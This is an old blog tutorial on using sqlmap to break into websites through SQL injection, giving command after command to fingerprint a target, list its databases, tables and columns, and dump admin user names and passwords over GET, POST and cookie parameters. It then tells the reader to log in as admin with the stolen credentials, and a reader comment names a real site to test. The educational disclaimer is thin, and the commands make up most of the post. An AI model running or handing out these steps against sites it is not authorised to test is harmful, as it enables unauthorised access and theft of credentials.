Monday, April 29, 2013



note

this article is only for educational, and I not responsibility with damage caused by anyone. the purpose of this article to learn web admin to secure the website.

introduction


sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. 
you can download sqlmap here



how to use sqlmap on GET method


- fingerprinting

first you must have a vulnerable website for the target, if you was have a target now open sqlmap and type this command
./sqlmap.py -u "http://www.target.com/index.php?id=2"
sqlmap will detect vulnerable of your target and will tell you what the type of vulnerable and what is the database type. and if your target vulnerable go to next step.


- find database name

type this command to find database name
./sqlmap.py -u "http://www.target.com/index.php?id=2" --dbs
on this step, sqlmap will find the database name of your target, for example I use "web_db" for the database name.


- find tables name

after sqlmap find the databse name its time to find the tables name. use this command to find the table name
./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db --tables
there will show you some tables name inside "web_db" database, ok for example I use "tbl_admin" as  the tables name.


- find columns name

 its time to find what inside "tbl_admin" from "web_db" and we call it columns. to find columns type this command
./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin --columns
it will show you  the list of columns name, for example I find "user" and "password" columns.


- dump

 this command will dumped data from the columns, type this command
./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin -C user,password --dump
and I find "user = admin" and "password = adminpass". now go to the web and find the admin login.



how to use sqlmap on POST method


its the same way with GET method, its just that you have to insert POST data to the sqlmap. for example I have vulnerable site on the "login.php" path. the POST data is "id=admin&pwd=password&submit=login". how to find the POST data ? just use "Live HTTPheaders" its a firefox add ons.


- fingerprinting

its same way with GET method, just type this command
./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login"

- find database name

./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" --dbs 

- find tables name

./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" -D web_db --tables  

- find columns name

./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" -D web_db -T tbl_admin --columns 

- dump

./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" -D web_db -T tbl_admin -C user,password --dump


 include cookie


still same method but you just should insert the cookie
./sqlmap.py -u "http://www.target.com/index.php?id=2" --cookie="PHPSESSID=123asdqwe456blabla;user=admin"
or
./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" --cookie="PHPSESSID=123asdqwe456blabla;user=admin"


custom parameter


if you have a custom parameter to inject you can type "-p" like this command
./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=password&submit=login" --cookie="PHPSESSID=123asdqwe456blabla;user=admin" -p "pwd"
sqlmap will inject "pwd" parameter. or you can give star"*" to the parameter to inject, like this
./sqlmap.py -u "http://www.target.com/login.php" --data="id=admin&pwd=*password&submit=login" --cookie="PHPSESSID=123asdqwe456blabla;user=admin"

cover


if you a windows users, dont use "./" to run it on cmd.

ok I think its enough for now, I will explain more about sqlmap next time.
thanks to read my articles :D

6 comments:

  1. I would say it is way better to do manually
    Using tools is good unless you have learned what is happening behind
    By the Way Nice Post

    ReplyDelete
  2. This comment has been removed by the author.

    ReplyDelete
  3. I want check my website for vulnerable, but not works. www.glucholazy.eu at joomla 2.5.4

    ReplyDelete